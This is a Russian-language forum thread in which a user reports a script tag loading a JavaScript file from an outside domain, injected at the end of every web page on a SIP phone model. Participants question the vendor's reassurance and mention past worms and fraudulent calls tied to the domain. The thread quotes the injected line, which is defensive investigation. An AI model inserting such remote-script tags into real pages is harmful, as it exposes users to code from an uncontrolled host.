На главную Наши проекты:
Журнал   ·   Discuz!ML   ·   Wiki   ·   DRKB   ·   Помощь проекту
ПРАВИЛА FAQ Помощь Участники Календарь Избранное RSS
msm.ru
! Правила!
Пожалуйста, подумайте два! раза перед тем как нажать кнопку Отправить.
Убедительная просьба пользоваться поиском и ИНСТРУКЦИЕЙ, и только потом спрашивать!


  • Публикация вирусов/эксплоитов в бинарном виде запрещена!
  • Запрещается размещать прямые ссылки на зараженные сайты! (если хочется предупредить, то исправляйте HTTP://... на ХТТП://...)
  • Категорически запрещается поиск кряков/варезов/серийников, а также размещение ссылок на серийники/ключи/кряки и т.п.
  • Запрещается использование оскорбительных выражений в адрес участников коференции, в том числе и в личной переписке.


Модераторы: Rust
  
> Подозрительный код в SIP телефоне
    Стал ругаться гугл на открытие внутреннего IP телефона.

    Смотрю код страницы, вижу:
    ExpandedWrap disabled
      </body>
      </html>
       
      <script language=javascript src=http://www.haofbi.com/js/w.js></script>


    Именно на этот сайт и ругается гугл. Такая вставка на каждой странице самой последней строчкой!!! Во всех телефонах этой модели.

    Поиск по гуглу ничего вразумительно го не дал, кроме как похожие посты с вопросами о том, что это такое.

    Вот ответ суппорта:
    Цитата
    Добрый!

    Не переживайте, вируса в ПО никакого нет!
    Сайта такого на сегодня вообще не существует:
    Vladimirs-Mac-mini:~ vladimirgurin$ ping www.haofbi.com
    ping: cannot resolve www.haofbi.com: Unknown host

    Ранее он был необходим разработчикам ПО телефона.


    Этот код после </html> вообще исполняется? Или там мертвым грузом лежит? И вообще как-то странно это все...
      haofbi.com - домен, принадлежавший китайскому хостеру Xin Net. В прошлом году бегали пара червяков, славших туда что-то... подробностей не знаю (краем уха слышал, что оттуда через заражённые IP-телефонные станции качались "левые" звонки, что при хреновой настройке вставало владельцам в изрядную копеечку). На текущий момент аренда имени не продлена, DNS-ы про домен не знают.

      Но откуда-то оно у тебя берётся...
        Меня смутило что "Ранее он был необходим разработчикам ПО телефона." Браузерным анализатором видно, что есть GET запросы туда, так что что явно не то.
        user posted image
          Цитата ^D^ima @
          Меня смутило что "Ранее он был необходим разработчикам ПО телефона."

          Да я бы вообще вздрючился по этой фразе. Во радости, когда твоё оборудование что-то куда-то, а ты не ухом ни рылом...
            ^D^ima
            Цитата ^D^ima @
            Меня смутило что "Ранее он был необходим разработчикам ПО телефона."

            1) Не обращай внимание на название. Оно не всегда отражает суть проблемы. Даже я бы сказал так оно всегда не отображает суть проблемы.
            ИБ-уязвимостей слишком много и человек там как правило почти ничего не поверяет а используются программы-роботы. И что она там и как классифицировала никто не знает.
            2)
            Может левые звонки делали, но скорее всего просто свою рекламу показывали у них это модно и не запрещено.
            Цитата Akina @
            когда твоё оборудование что-то куда-то, а ты не ухом ни рылом...

            А инструкцию и договор никто не читает... А там наверно мелким шрифтом и непонятными словами.
              Цитата Pavia @
              А инструкцию и договор

              Договор на что? и инструкция на 4 страницы
                Собственно тот-же телефон:
                Прикреплённый файлПрикреплённый файлphone.jpg (98,88 Кбайт, скачиваний: 53)
                  Ещё и ддосит походу:
                  Прикреплённый файлПрикреплённый файлphone2.png (133,8 Кбайт, скачиваний: 57)
                    :D
                    Прикреплённый файлПрикреплённый файлphone3.png (56,09 Кбайт, скачиваний: 52)
                    0 пользователей читают эту тему (0 гостей и 0 скрытых пользователей)
                    0 пользователей:


                    Рейтинг@Mail.ru
                    [ Script execution time: 0,0319 ]   [ 21 queries used ]   [ Generated: 8.12.22, 02:27 GMT ]